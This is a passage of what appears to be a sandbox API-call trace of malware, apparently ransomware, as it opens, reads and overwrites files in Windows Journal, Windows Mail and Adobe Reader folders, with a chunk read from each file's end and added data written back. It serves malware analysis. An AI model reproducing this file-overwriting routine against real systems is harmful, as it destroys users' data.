lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0066.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Synchronization.rll", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Synchronization.rll", lpUsedDefaultChar=0x0) returned 19 [0066.298] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2170 [0066.300] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2170 [0066.301] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5688*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.301] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.301] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.301] CloseHandle (hObject=0x1fc) returned 1 [0066.303] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\component.exe" (normalized: "c:\\program files\\windows journal\\component.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.303] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\component.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\component.exe", lpFilePart=0x345f690*="component.exe") returned 0x2e [0066.303] GetLastError () returned 0x20 [0066.303] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x51 [0066.303] LocalFree (hMem=0x696d00) returned 0x0 [0066.304] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.304] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0066.304] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.304] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\component.exe" (normalized: "c:\\program files\\windows journal\\component.exe")) returned 0x20 [0066.305] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe" (normalized: "c:\\program files\\windows journal\\journal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Journal.exe", lpFilePart=0x345f690*="Journal.exe") returned 0x2c [0066.306] GetLastError () returned 0x5 [0066.306] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0066.306] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.306] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.306] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0066.306] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.306] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe" (normalized: "c:\\program files\\windows journal\\journal.exe")) returned 0x20 [0066.307] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" (normalized: "c:\\program files\\windows journal\\templates\\month_calendar.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", lpFilePart=0x345f690*="Month_Calendar.jtp") returned 0x3d [0066.308] GetLastError () returned 0x5 [0066.308] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0066.308] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.308] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.308] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0066.308] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.309] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" (normalized: "c:\\program files\\windows journal\\templates\\month_calendar.jtp")) returned 0x20 [0066.309] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\told.exe" (normalized: "c:\\program files\\windows mail\\told.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\told.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\told.exe", lpFilePart=0x345f690*="told.exe") returned 0x26 [0066.309] GetLastError () returned 0x20 [0066.309] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x51 [0066.309] LocalFree (hMem=0x696d00) returned 0x0 [0066.310] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.310] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0066.310] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.310] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\told.exe" (normalized: "c:\\program files\\windows mail\\told.exe")) returned 0x20 [0066.310] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe" (normalized: "c:\\program files\\windows portable devices\\mxslipstream.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.310] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", lpFilePart=0x345f690*="mxslipstream.exe") returned 0x3a [0066.310] GetLastError () returned 0x20 [0066.310] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x51 [0066.311] LocalFree (hMem=0x696d00) returned 0x0 [0066.311] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.311] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0066.311] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.311] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0066.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe" (normalized: "c:\\program files\\windows portable devices\\mxslipstream.exe")) returned 0x20 [0066.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.313] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.314] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x423b [0066.314] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.314] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.314] ReleaseMutex (hMutex=0x168) returned 1 [0066.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Leame.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0066.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Leame.htm", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leame.htm", lpUsedDefaultChar=0x0) returned 9 [0066.314] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x323b [0066.316] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.317] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x323b [0066.317] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5688*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.320] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.321] CloseHandle (hObject=0x1fc) returned 1 [0066.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroBroker.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrobroker.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.323] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.323] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x47f98 [0066.323] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.323] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.323] ReleaseMutex (hMutex=0x168) returned 1 [0066.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroBroker.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0066.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroBroker.exe", cchWideChar=14, lpMultiByteStr=0x1f7328c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroBroker.exe", lpUsedDefaultChar=0x0) returned 14 [0066.324] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0066.326] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x46f98 [0066.326] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.331] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x46f98 [0066.331] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5688*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.332] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.332] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0066.333] CloseHandle (hObject=0x1fc) returned 1 [0066.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.340] ReleaseMutex (hMutex=0x168) returned 1 [0066.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHS", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CHS", lpUsedDefaultChar=0x0) returned 11 [0066.340] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea5688, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.342] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.342] WriteFile (in: hFile=0x1fc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.343] CloseHandle (hObject=0x1fc) returned 1 [0066.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.345] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.345] ReleaseMutex (hMutex=0x168) returned 1 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HRV", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.HRV", lpUsedDefaultChar=0x0) returned 11 [0066.346] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea5688, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.347] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.347] WriteFile (in: hFile=0x1fc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.348] CloseHandle (hObject=0x1fc) returned 1 [0066.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.351] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.351] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.351] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.351] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.351] ReleaseMutex (hMutex=0x168) returned 1 [0066.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.PTB", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.PTB", lpUsedDefaultChar=0x0) returned 11 [0066.351] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea5688, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.510] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.510] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.511] CloseHandle (hObject=0x1fc) returned 1 [0066.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.733] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.733] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0066.733] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.733] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.733] ReleaseMutex (hMutex=0x168) returned 1 [0066.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.UKR", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.UKR", lpUsedDefaultChar=0x0) returned 11 [0066.733] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.735] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.735] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 